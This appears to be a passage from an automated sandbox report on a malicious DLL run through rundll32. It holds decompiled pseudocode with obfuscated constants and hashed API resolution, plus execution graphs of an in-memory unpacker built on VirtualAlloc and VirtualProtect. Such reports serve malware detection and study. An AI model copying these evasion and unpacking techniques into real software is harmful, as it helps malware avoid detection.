                                                          • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                          • Instruction Fuzzy Hash: 0EB19AB5E00109EFCB48CF84D590EAEB7B5BF88314F248159E919AB355D735EE82CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 96 10001b9d-10001c6d call 10017b8c call 10004010 lstrcmpiW
                                                          C-Code - Quality: 90%
                                                          			E10001B9D(void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v24;
                                                          				intOrPtr _v28;
                                                          				intOrPtr _v32;
                                                          				void* _t49;
                                                          				int _t63;
                                                          				signed int _t65;
                                                          				signed int _t66;
                                                          
                                                          				_push(_a8);
                                                          				_push(_a4);
                                                          				E10017B8C(_t49);
                                                          				_v24 = _v24 & 0x00000000;
                                                          				_v32 = 0x6d740e;
                                                          				_v28 = 0x43ca31;
                                                          				_v8 = 0xde52;
                                                          				_v8 = _v8 + 0xffff302d;
                                                          				_t65 = 0x73;
                                                          				_v8 = _v8 / _t65;
                                                          				_t66 = 0x33;
                                                          				_v8 = _v8 * 0x3f;
                                                          				_v8 = _v8 ^ 0x00005145;
                                                          				_v16 = 0xb51c;
                                                          				_v16 = _v16 * 0x19;
                                                          				_v16 = _v16 ^ 0x573bb19d;
                                                          				_v16 = _v16 ^ 0x572a283c;
                                                          				_v12 = 0xa3c7;
                                                          				_v12 = _v12 / _t66;
                                                          				_v12 = _v12 * 0x3f;
                                                          				_v12 = _v12 ^ 0x0000bd7b;
                                                          				_v20 = 0x5d2c;
                                                          				_v20 = _v20 ^ 0x811e33c3;
                                                          				_v20 = _v20 ^ 0x811e27aa;
                                                          				E10004010(_t66, 0xac2d26d8, 0x79, _t66, 0xd964d70b);
                                                          				_t63 = lstrcmpiW(_a4, _a8); // executed
                                                          				return _t63;
                                                          			}














                                                          0x10001ba3
                                                          0x10001ba6
                                                          0x10001bab
                                                          0x10001bb0
                                                          0x10001bb6
                                                          0x10001bbd
                                                          0x10001bc4
                                                          0x10001bcb
                                                          0x10001bd7
                                                          0x10001bdc
                                                          0x10001be5
                                                          0x10001be9
                                                          0x10001bec
                                                          0x10001bf3
                                                          0x10001c06
                                                          0x10001c09
                                                          0x10001c10
                                                          0x10001c17
                                                          0x10001c28
                                                          0x10001c2f
                                                          0x10001c32
                                                          0x10001c39
                                                          0x10001c40
                                                          0x10001c47
                                                          0x10001c5a
                                                          0x10001c68
                                                          0x10001c6d

                                                          APIs
                                                          • lstrcmpiW.KERNELBASE(0000BD7B,572A283C), ref: 10001C68
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2102553232.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000007.00000002.2102568700.0000000010021000.00000040.00000001.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcmpi
                                                          • String ID: <(*W
                                                          • API String ID: 1586166983-931366690
                                                          • Opcode ID: 79c9eacbb9d446e0444c777dfc7be36fec9ace95d4ad31c2aba0456db5e49aa4
                                                          • Instruction ID: 5c987274e65c3c22dfdbb34c56d7d9efcbdc8bc590f707738c434fd9af89b748
                                                          • Opcode Fuzzy Hash: 79c9eacbb9d446e0444c777dfc7be36fec9ace95d4ad31c2aba0456db5e49aa4
                                                          • Instruction Fuzzy Hash: 062120B5D00208EFDB04CFE4C98A99EBBB1EB44304F10C08AE414AB2A0D7B99B419F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 101 19f550-19f59b call 19f960 104 19f5aa-19f5da call 19f330 VirtualAlloc 101->104 105 19f59d-19f5a7 call 19f960 101->105 105->104
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019F5D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2101655988.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_180000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: VirtualAlloc
                                                          • API String ID: 4275171209-164498762
                                                          • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                          • Instruction ID: c0cf902db63e4ed20e9f4f74eb259fd0881dba2f6be514e3d5abf6831e0be3b3
                                                          • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                          • Instruction Fuzzy Hash: F9113060D08289EEEF01D7E884097EEBFB55B21708F044098E5446A282D3BA5759CBA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 111 10019c80-10019d6c call 10017b8c call 10004010 CreateProcessW
                                                          C-Code - Quality: 40%
                                                          			E10019C80(struct _PROCESS_INFORMATION* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a24, struct _STARTUPINFOW* _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, int _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				void* _t53;
                                                          				int _t64;
                                                          				signed int _t67;
                                                          				signed int _t68;
                                                          				WCHAR* _t75;
                                                          				struct _PROCESS_INFORMATION* _t76;
                                                          
                                                          				_t75 = __edx;
                                                          				_push(0);
                                                          				_push(_a68);
                                                          				_t76 = __ecx;
                                                          				_push(_a64);
                                                          				_push(_a60);
                                                          				_push(_a56);
                                                          				_push(0);
                                                          				_push(_a48);
                                                          				_push(_a44);
                                                          				_push(_a40);
                                                          				_push(_a36);
                                                          				_push(_a32);
                                                          				_push(0);
                                                          				_push(_a24);
                                                          				_push(0);
                                                          				_push(0);
                                                          				_push(_a12);
                                                          				_push(_a8);
                                                          				_push(_a4);
                                                          				_push(__edx);
                                                          				_push(__ecx);
                                                          				E10017B8C(_t53);
                                                          				_v12 = 0x6630;
                                                          				_t67 = 0x77;
                                                          				_v12 = _v12 / _t67;
                                                          				_v12 = _v12 ^ 0x714ffcce;
                                                          				_v12 = _v12 ^ 0x714f8e45;
                                                          				_v8 = 0x1428;
                                                          				_v8 = _v8 >> 0xf;
                                                          				_t68 = 0x7f;
                                                          				_v8 = _v8 / _t68;
                                                          				_v8 = _v8 ^ 0x00007a2e;
                                                          				_v20 = 0x48d2;
                                                          				_v20 = _v20 + 0xab8a;
                                                          				_v20 = _v20 ^ 0x0000b473;
                                                          				_v16 = 0x6e9f;
                                                          				_v16 = _v16 + 0xffff30eb;
                                                          				_v16 = _v16 ^ 0xffffa3a6;
                                                          				E10004010(_t68, 0xac2d26d8, 0x2b0, _t68, 0xd9f4cde0);
                                                          				_t64 = CreateProcessW(_t75, _a8, 0, 0, _a56, 0, 0, 0, _a32, _t76); // executed
                                                          				return _t64;
                                                          			}













                                                          0x10019c8b
                                                          0x10019c8d
                                                          0x10019c8e
                                                          0x10019c91
                                                          0x10019c93
                                                          0x10019c96
                                                          0x10019c99
                                                          0x10019c9c
                                                          0x10019c9d
                                                          0x10019ca0
                                                          0x10019ca3
                                                          0x10019ca6
                                                          0x10019ca9
                                                          0x10019cac
                                                          0x10019cad
                                                          0x10019cb0
                                                          0x10019cb1
                                                          0x10019cb2
                                                          0x10019cb5
                                                          0x10019cb8
                                                          0x10019cbb
                                                          0x10019cbc
                                                          0x10019cbd
                                                          0x10019cc2
                                                          0x10019cd0
                                                          0x10019cd5
                                                          0x10019cda
                                                          0x10019ce1
                                                          0x10019ce8
                                                          0x10019cef
                                                          0x10019cf6
                                                          0x10019d01
                                                          0x10019d04
                                                          0x10019d0b
                                                          0x10019d12
                                                          0x10019d19
                                                          0x10019d20
                                                          0x10019d27
                                                          0x10019d2e
                                                          0x10019d4c
                                                          0x10019d64
                                                          0x10019d6c

                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,FFFFA3A6,00000000,00000000,?,00000000,00000000,00000000,?,F5ADA244), ref: 10019D64
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2102553232.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000007.00000002.2102568700.0000000010021000.00000040.00000001.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 2d3afecef0eae13ec00b8db049d1962f0b6ad99aa455ddf0e27f43013b9b1411
                                                          • Instruction ID: 6f6f4ffef16e4567f02434b93fb23f43c8a1571d2b23c853eb8330a43a9d40a6
                                                          • Opcode Fuzzy Hash: 2d3afecef0eae13ec00b8db049d1962f0b6ad99aa455ddf0e27f43013b9b1411
                                                          • Instruction Fuzzy Hash: 6B31F9B690020CBFEF05DE95CD85CEEBB7AFB48354F108089FA1466260D7769E61AB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 116 1001ba7b-1001bb44 call 10017b8c call 10004010 SHGetFolderPathW
                                                          C-Code - Quality: 58%
                                                          			E1001BA7B(void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				unsigned int _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				void* _t43;
                                                          				intOrPtr* _t52;
                                                          				void* _t53;
                                                          				signed int _t54;
                                                          				void* _t60;
                                                          
                                                          				_t60 = __edx;
                                                          				E10017B8C(_t43);
                                                          				_v28 = 0x37183;
                                                          				_v24 = 0;
                                                          				_v20 = 0xc1e;
                                                          				_v20 = _v20 ^ 0x1ddfc436;
                                                          				_v20 = _v20 ^ 0x1ddf9af4;
                                                          				_v16 = 0xef7f;
                                                          				_t54 = 0x45;
                                                          				_v16 = _v16 * 0x79;
                                                          				_v16 = _v16 >> 2;
                                                          				_v16 = _v16 ^ 0x001c4db5;
                                                          				_v12 = 0x4c2e;
                                                          				_v12 = _v12 << 0xd;
                                                          				_v12 = _v12 / _t54;
                                                          				_v12 = _v12 ^ 0x00237cb0;
                                                          				_v8 = 0xd2af;
                                                          				_v8 = _v8 << 5;
                                                          				_v8 = _v8 + 0xffffc92f;
                                                          				_v8 = _v8 ^ 0x001a0fe8;
                                                          				_t52 = E10004010(_t54, 0xeed7a5cf, 0x2d2, _t54, 0x708e2747);
                                                          				_t53 =  *_t52(0, _t60, 0, 0, _a20, 0, __edx, 0, _a8, _a12, 0, _a20, _a24, _a28); // executed
                                                          				return _t53;
                                                          			}














                                                          0x1001ba88
                                                          0x1001ba9a
                                                          0x1001ba9f
                                                          0x1001baa8
                                                          0x1001baab
                                                          0x1001bab2
                                                          0x1001bab9
                                                          0x1001bac0
                                                          0x1001bacd
                                                          0x1001bad1
                                                          0x1001bad4
                                                          0x1001bad8
                                                          0x1001badf
                                                          0x1001bae6
                                                          0x1001baf4
                                                          0x1001bafc
                                                          0x1001bb03
                                                          0x1001bb0a
                                                          0x1001bb0e
                                                          0x1001bb15
                                                          0x1001bb2e
                                                          0x1001bb3d
                                                          0x1001bb44

                                                          APIs
                                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,00037183,?,?,?,?,?,?,?,?,00000003,1B835AC8,1B835AC8), ref: 1001BB3D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2102553232.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000007.00000002.2102568700.0000000010021000.00000040.00000001.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FolderPath
                                                          • String ID:
                                                          • API String ID: 1514166925-0
                                                          • Opcode ID: b1a1f18e4c2d1cca216e18cf7875c89d58af22bf91d37e0d639e08c95d6c68c0
                                                          • Instruction ID: e57e8dc99711bf8f73612d28d45590ecd43cf8e3c82c42321f98dcc01df6ce76
                                                          • Opcode Fuzzy Hash: b1a1f18e4c2d1cca216e18cf7875c89d58af22bf91d37e0d639e08c95d6c68c0
                                                          • Instruction Fuzzy Hash: 322134B5D00209BBDB10DFAAC84A8EFBFB8EB95314F108089F924A6250C3B44A55DF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          C-Code - Quality: 100%
                                                          			E1000A823() {
                                                          
                                                          				return  *[fs:0x30];
                                                          			}



                                                          0x1000a829

                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2102553232.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000007.00000002.2102568700.0000000010021000.00000040.00000001.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                          • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                          • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:9.1%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:13
                                                          Total number of Limit Nodes:1

                                                          Graph

                                                          execution_graph 1173 14fed0 1174 14feed 1173->1174 1179 14f550 1174->1179 1176 14ff7c 1182 14fb30 VirtualAlloc 1176->1182 1178 14ffb3 1180 14f591 1179->1180 1181 14f5c4 VirtualAlloc 1180->1181 1181->1176 1183 14fb8e 1182->1183 1184 14fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1185 14fc50 1184->1185 1186 14fd7d 1185->1186 1187 14fd52 VirtualProtect 1185->1187 1186->1178 1187->1185

                                                          Executed Functions

                                                          Control-flow Graph

                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0014FB75
                                                          • UnmapViewOfFile.KERNELBASE(?), ref: 0014FC25
                                                          • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0014FC3F
                                                          • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0014FD70
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2113534023.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_130000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Alloc$FileProtectUnmapView
                                                          • String ID:
                                                          • API String ID: 238919573-0
                                                          • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                          • Instruction ID: 8a1153281cf7b3d8a74905fabf6c6c09a49ce1311eafc2b1b0eded3b52a143ad
                                                          • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                          • Instruction Fuzzy Hash: 7BB188B5E001099FCB48CF84D590EAEB7B5FF88314F248159E919AB355D735EE82CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 39 14f550-14f59b call 14f960 42 14f59d-14f5a7 call 14f960 39->42 43 14f5aa-14f5da call 14f330 VirtualAlloc 39->43 42->43
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0014F5D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2113534023.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_130000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: VirtualAlloc
                                                          • API String ID: 4275171209-164498762
                                                          • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                          • Instruction ID: c6c412b1bbc447a28259970365211f4b63b13cc70bc42bd4fb778739b311ea40
                                                          • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                          • Instruction Fuzzy Hash: 3B113360D08289EEEB01D7E8C4057EEBFB55B21704F044098E5446A382D3BA5759C7A6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Execution Graph

                                                          Execution Coverage:9.1%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:13
                                                          Total number of Limit Nodes:1

                                                          Graph

                                                          execution_graph 1173 18fed0 1174 18feed 1173->1174 1179 18f550 1174->1179 1176 18ff7c 1182 18fb30 VirtualAlloc 1176->1182 1178 18ffb3 1180 18f591 1179->1180 1181 18f5c4 VirtualAlloc 1180->1181 1181->1176 1183 18fb8e 1182->1183 1184 18fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1186 18fc50 1184->1186 1185 18fd7d 1185->1178 1186->1185 1187 18fd52 VirtualProtect 1186->1187 1187->1186

                                                          Executed Functions

                                                          Control-flow Graph

                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0018FB75
                                                          • UnmapViewOfFile.KERNELBASE(?), ref: 0018FC25
                                                          • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0018FC3F
                                                          • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0018FD70
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2123259348.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Alloc$FileProtectUnmapView
                                                          • String ID:
                                                          • API String ID: 238919573-0
                                                          • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                          • Instruction ID: 39918c2dbd628486d70b19799d91e5fb63b7c1efa6b54dfaa6c75e8db99e171c
                                                          • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                          • Instruction Fuzzy Hash: 67B198B5A00109DFCB48DF84D590AAEB7B5BF88314F208159E919AB355D735EE82CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 39 18f550-18f59b call 18f960 42 18f5aa-18f5da call 18f330 VirtualAlloc 39->42 43 18f59d-18f5a7 call 18f960 39->43 43->42
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0018F5D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2123259348.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: VirtualAlloc
                                                          • API String ID: 4275171209-164498762
                                                          • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                          • Instruction ID: c61c6a7a7a381565e8d0ea874d5e99c4139e21a27dd140a877b963908e4bed99
                                                          • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                          • Instruction Fuzzy Hash: AD113060D08289EEEB01D7E894097EEBFB55B21708F044098E5446A282D3BA5759CBA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Execution Graph

                                                          Execution Coverage:9.1%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:13
                                                          Total number of Limit Nodes:1

                                                          Graph

                                                          execution_graph 1173 18fed0 1174 18feed 1173->1174 1179 18f550 1174->1179 1176 18ff7c 1182 18fb30 VirtualAlloc 1176->1182 1178 18ffb3 1180 18f591 1179->1180 1181 18f5c4 VirtualAlloc 1180->1181 1181->1176 1183 18fb8e 1182->1183 1184 18fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1186 18fc50 1184->1186 1185 18fd7d 1185->1178 1186->1185 1187 18fd52 VirtualProtect 1186->1187 1187->1186

                                                          Executed Functions

                                                          Control-flow Graph

                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0018FB75
                                                          • UnmapViewOfFile.KERNEL32(?), ref: 0018FC25
                                                          • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 0018FC3F
                                                          • VirtualProtect.KERNEL32(?,?,00000000), ref: 0018FD70
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2336190796.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_170000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Alloc$FileProtectUnmapView
                                                          • String ID:
                                                          • API String ID: 238919573-0
                                                          • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                          • Instruction ID: 39918c2dbd628486d70b19799d91e5fb63b7c1efa6b54dfaa6c75e8db99e171c
                                                          • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                          • Instruction Fuzzy Hash: 67B198B5A00109DFCB48DF84D590AAEB7B5BF88314F208159E919AB355D735EE82CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 39 18f550-18f59b call 18f960 42 18f5aa-18f5da call 18f330 VirtualAlloc 39->42 43 18f59d-18f5a7 call 18f960 39->43 43->42
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0018F5D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2336190796.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_170000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: VirtualAlloc
                                                          • API String ID: 4275171209-164498762
                                                          • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                          • Instruction ID: c61c6a7a7a381565e8d0ea874d5e99c4139e21a27dd140a877b963908e4bed99
                                                          • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                          • Instruction Fuzzy Hash: AD113060D08289EEEB01D7E894097EEBFB55B21708F044098E5446A282D3BA5759CBA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions